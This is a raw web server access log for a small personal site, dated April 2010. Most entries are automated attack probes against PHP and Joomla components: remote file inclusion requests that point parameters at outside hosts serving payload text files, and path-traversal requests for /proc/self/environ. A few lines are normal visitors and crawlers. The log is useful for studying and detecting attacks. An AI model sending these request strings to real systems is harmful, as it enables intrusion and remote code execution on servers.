212.174.28.46 - - [27/Apr/2010:23:34:17 -0500] "GET //vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:34:17 -0500] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:34:17 -0500] "GET /logs/access_log.1233532800//vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:23:34:47 -0500] "GET /logs//admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:23:34:47 -0500] "GET //admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:23:34:47 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:35:08 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:35:08 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:35:08 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
72.30.161.241 - - [27/Apr/2010:23:35:09 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [27/Apr/2010:23:35:09 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [27/Apr/2010:23:35:13 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:23:35:13 -0500] "GET //admin/auth.php?xcart_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:23:35:17 -0500] "GET /logs//admin/auth.php?xcart_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:36:02 -0500] "GET //vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:36:02 -0500] "GET /logs/access_log.1262563200//vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:36:02 -0500] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.8.3.157 - - [27/Apr/2010:23:37:37 -0500] "GET /logs/access_log.1212969600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
61.8.3.157 - - [27/Apr/2010:23:37:38 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
61.8.3.157 - - [27/Apr/2010:23:37:38 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
75.37.129.177 - - [27/Apr/2010:23:40:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/url?sa=t&source=web&ct=res&cd=8&ved=0CB4QFjAH&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+tattoo+flash&ei=FbzXS5afCYmOtAOk-9WfBg&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.37.129.177 - - [27/Apr/2010:23:40:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.37.129.177 - - [27/Apr/2010:23:40:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.37.129.177 - - [27/Apr/2010:23:40:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
64.15.156.83 - - [27/Apr/2010:23:41:52 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:23:41:52 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:23:41:52 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:23:42:14 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:23:45:44 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.205.67.235 - - [27/Apr/2010:23:47:50 -0500] "GET /administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""oi"
67.205.67.235 - - [27/Apr/2010:23:47:50 -0500] "GET /logs/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""oi"
67.205.67.235 - - [27/Apr/2010:23:47:51 -0500] "GET /logs/access_log.1270684800/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 371 "-""oi"
67.205.67.235 - - [27/Apr/2010:23:52:22 -0500] "GET /logs/access_log.1268956800/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 371 "-""oi"
72.249.126.147 - - [28/Apr/2010:00:03:21 -0500] "GET //include/write.php?dir=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:00:03:26 -0500] "GET /logs//include/write.php?dir=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:00:03:26 -0500] "GET /logs/access_log.1220054400//include/write.php?dir=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.249.71.36 - - [28/Apr/2010:00:06:16 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.207.28 - - [28/Apr/2010:00:08:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.50.85.15 - - [28/Apr/2010:00:10:18 -0500] "GET //config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:10:18 -0500] "GET /logs//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:10:18 -0500] "GET /logs/access_log.1268611200%20%20//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:11:38 -0500] "GET /logs//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:11:38 -0500] "GET //config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:11:38 -0500] "GET /logs/access_log.1268611200%20%20//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:13:16 -0500] "GET /logs/access_log.1268611200//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:13:22 -0500] "GET /logs/access_log.1268956800//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:14:21 -0500] "GET /logs/access_log.1268611200//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.50.85.15 - - [28/Apr/2010:00:14:28 -0500] "GET /logs/access_log.1268956800//config.php?base_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.92.82.201 - - [28/Apr/2010:00:16:42 -0500] "GET /logs/scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.831"
77.92.82.201 - - [28/Apr/2010:00:16:43 -0500] "GET /scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.831"
69.175.97.18 - - [28/Apr/2010:00:31:34 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.97.18 - - [28/Apr/2010:00:31:34 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
69.175.97.18 - - [28/Apr/2010:00:31:34 -0500] "GET /logs/access_log.1268611200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.175.97.18 - - [28/Apr/2010:00:31:56 -0500] "GET /logs/access_log.1270684800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.175.97.18 - - [28/Apr/2010:00:32:34 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
222.236.47.182 - - [28/Apr/2010:00:32:48 -0500] "GET /logs//administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.236.47.182 - - [28/Apr/2010:00:32:48 -0500] "GET //administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.236.47.182 - - [28/Apr/2010:00:32:48 -0500] "GET /logs/access_log.1210896000//administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.175.97.18 - - [28/Apr/2010:00:35:02 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
69.175.97.18 - - [28/Apr/2010:00:35:02 -0500] "GET /logs/access_log.1266278400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
222.236.47.182 - - [28/Apr/2010:00:35:19 -0500] "GET /logs/access_log.1210896000//administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.236.47.182 - - [28/Apr/2010:00:35:19 -0500] "GET /logs//administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.236.47.182 - - [28/Apr/2010:00:35:19 -0500] "GET //administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:35:36 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:35:36 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:35:36 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:35:36 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:35:36 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:35:37 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:37:01 -0500] "GET /logs/access_log.1268611200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:37:04 -0500] "GET /logs/access_log.1268611200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:37:20 -0500] "GET /logs/access_log.1270684800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:37:32 -0500] "GET /logs/access_log.1270684800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
116.122.36.34 - - [28/Apr/2010:00:40:19 -0500] "GET //modules/My_eGallery/index.php?basepath=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
116.122.36.34 - - [28/Apr/2010:00:40:19 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
116.122.36.34 - - [28/Apr/2010:00:40:19 -0500] "GET /logs/access_log.1220054400//modules/My_eGallery/index.php?basepath=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:40:22 -0500] "GET /logs/access_log.1266278400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:40:23 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:40:54 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:00:40:54 -0500] "GET /logs/access_log.1266278400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
68.5.81.236 - - [28/Apr/2010:00:43:45 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=16&sig2=PmcDrhHbGSTXYNWbh3dfsg&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26hl%3Den%26safe%3Doff%26gbv%3D2%26tbs%3Disch:1&ei=DsvXS_u_EYWM8ATivoG7Bw""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0"
68.5.81.236 - - [28/Apr/2010:00:43:45 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0"
68.5.81.236 - - [28/Apr/2010:00:43:45 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0"
68.5.81.236 - - [28/Apr/2010:00:43:45 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0"
68.5.81.236 - - [28/Apr/2010:00:43:45 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0"
68.5.81.236 - - [28/Apr/2010:00:43:45 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0"
116.122.36.34 - - [28/Apr/2010:00:44:21 -0500] "GET /logs/access_log.1220054400%20%20//modules/My_eGallery/index.php?basepath=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:00:44:51 -0500] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:00:44:51 -0500] "GET /logs/access_log.1232668800%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
222.231.60.209 - - [28/Apr/2010:00:44:51 -0500] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:00:47:19 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:00:47:19 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:00:47:19 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:48:04 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:48:04 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:48:04 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:48:44 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:48:44 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:48:44 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:49:03 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:49:03 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:49:03 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:00:49:55 -0500] "GET /logs/access_log.1268611200//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:00:50:16 -0500] "GET /logs/access_log.1270684800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
174.129.111.79 - - [28/Apr/2010:00:50:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
174.129.111.79 - - [28/Apr/2010:00:50:27 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
69.175.59.242 - - [28/Apr/2010:00:54:15 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:00:54:15 -0500] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:00:54:15 -0500] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.199.182 - - [28/Apr/2010:00:54:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.59.242 - - [28/Apr/2010:00:54:49 -0500] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:00:54:49 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:00:54:49 -0500] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
116.122.36.34 - - [28/Apr/2010:00:56:29 -0500] "GET /logs/access_log.1219708800//modules/My_eGallery/index.php?basepath=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:57:38 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:58:07 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
180.210.205.21 - - [28/Apr/2010:00:58:21 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
